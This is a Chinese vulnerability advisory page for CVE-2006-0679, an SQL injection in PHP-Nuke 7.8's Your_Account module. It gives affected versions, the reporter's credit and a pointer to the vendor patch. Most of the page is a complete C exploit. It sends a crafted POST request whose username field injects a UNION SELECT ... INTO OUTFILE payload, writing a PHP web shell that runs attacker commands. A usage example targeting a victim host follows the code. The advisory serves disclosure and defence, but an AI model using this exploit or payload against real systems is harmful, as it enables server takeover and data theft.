首页 -> 安全研究
安全研究
安全漏洞
PHP-Nuke Your_Account模块远程SQL注入漏洞
发布日期:2006-02-28
更新日期:2006-02-28
受影响系统:
PHP-Nuke PHP-Nuke 7.8不受影响系统:
PHP-Nuke PHP-Nuke 7.9 + patch 3.1描述:
BUGTRAQ ID: 16691
CVE(CAN) ID: CVE-2006-0679
PHP-Nuke是一个广为流行的网站创建和管理工具,它可以使用很多数据库软件作为后端,比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。
PHP-Nuke的Your_Account模块实现上存在输入验证漏洞,远程攻击者可能利用此漏洞对服务器程序执行SQL注入攻击。
PHP-Nuke的Your_Account模块没有对username参数做充分的过滤检查,远程攻击者可能在此参数中插入恶意的SQL命令,从而非授权获取对后台数据库的操作。
<*来源:sp3x (sp3@xsecurityreason.com)
链接:http://archives.neohapsis.com/archives/bugtraq/2006-02/0260.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*==================================================\
# SecurityReason.com |
# ( sp3x ) sp3x@securtiyreason.com |
# |
# /---------------------------\ |
# | Ctitical SQL INCJECTION | |
# | PHPNuke <= 7.8 | |
# \---------------------------/ |
# |
# PHPNuke-sp3x[1] |
# This exploit is based on 'username' |
# SQL injection vuln in Your_Account module. |
# |
# References: |
# securityreason.com/achievement_securityalert/32 |
# |
# ---| work only on mysql version > 4.0 |--- |
# |
#==================================================*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT 80 // port of the web server
void begin(void);
void sqlinj(int sock, char *argv[]);
int main(int argc, char *argv[]){
int sock;
struct sockaddr_in addr;
struct hostent *hp=0;
if(argc!=4) {
begin();
}
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("\n\n[-] Creating socket [FAILED]\n\n");
exit(EXIT_FAILURE);
}
printf("\n\n[+] Creating socket [OK]\n");
if((hp = gethostbyname(argv[1])) == 0) {
printf("[-] Resolving %s [FAILED]\n\n", argv[1]);
exit(EXIT_FAILURE);
}
printf("[+] Resolving %s [OK]\n", argv[1]);
memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
printf("[-] Connecting at %s [FAILED]\n\n", argv[1]);
exit(EXIT_FAILURE);
}
printf("[+] Connecting at %s [OK]\n", argv[1]);
sqlinj(sock, argv);
printf("[+] Now check the shell\n"
"[+] http://%s\n\n",argv[1]);
shutdown(sock, 2);
close(sock);
return(0);
}
void begin(void){
printf("*---------------------------------------*\n"
"* SecurityReason *\n"
"* EXPLOIT for PHPNuke <=7.8 *\n"
"* Coded by : sp3x Date : 16.02.2006 *\n"
"*---------------------------------------*\n\n"
" Usage : \n"
" PHPNuke-sp3x[1] HOST /[path_phpnuke] [s_directory]\n\n"
" HOST - Host where is phpnuke example: localhost \n"
" [path_phpnuke] - PHPNuke directory\n"
" [s_directory] - shell directory where to upload\n\n"
" Example :\n\n"
" PHPNuke-sp3x[1] www.victim.com /phpnuke/html/ /home/sp3x/nuke78/html/shell.php \n"
" After this go to http://www.victim.com/phpnuke/html/shell.php?sr=ls \n\n");
exit(0);
return;
}
void sqlinj(int sock, char *argv[]){
FILE *go;
int size = 264;
go = fdopen(sock,"a");
if (go == 0) {
perror("[-] fdopen [FAILED]\n\n");
close(sock);
exit(EXIT_FAILURE);
}
setbuf(go,NULL);
size+=strlen(argv[3]);
fprintf(go,"POST %s HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Pragma: no-cache\n"
"Cache-control: no-cache\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n"
"Referer: http://%s%s?name=Your_Account&op=new user\n"
"User-Agent: SecurityReason - [SR]\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n"
"name=Your_Account&op=new user&user_email=securitybreak@securityreason.com&"
"user_password=hackme&user_password2=hackme&username="
"s'/**/UNION/**/SELECT/**/'<? echo \"SecurityReason Shell\";system($_GET
[sr]);'/**/FROM/**/nuke_authors/**/INTO/**/OUTFILE/**/'%s'/*\n\n"
"Cookie: lang=english\r\n\r\n",argv[2],argv[1],argv[1],argv[2],size,argv[3]);
printf("[+] Sending exploit [OK]\n\n");
}
建议:
厂商补丁:
PHP-Nuke
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://phpnuke.org/
浏览次数:4114
严重程度:0(网友投票)
绿盟科技给您安全的保障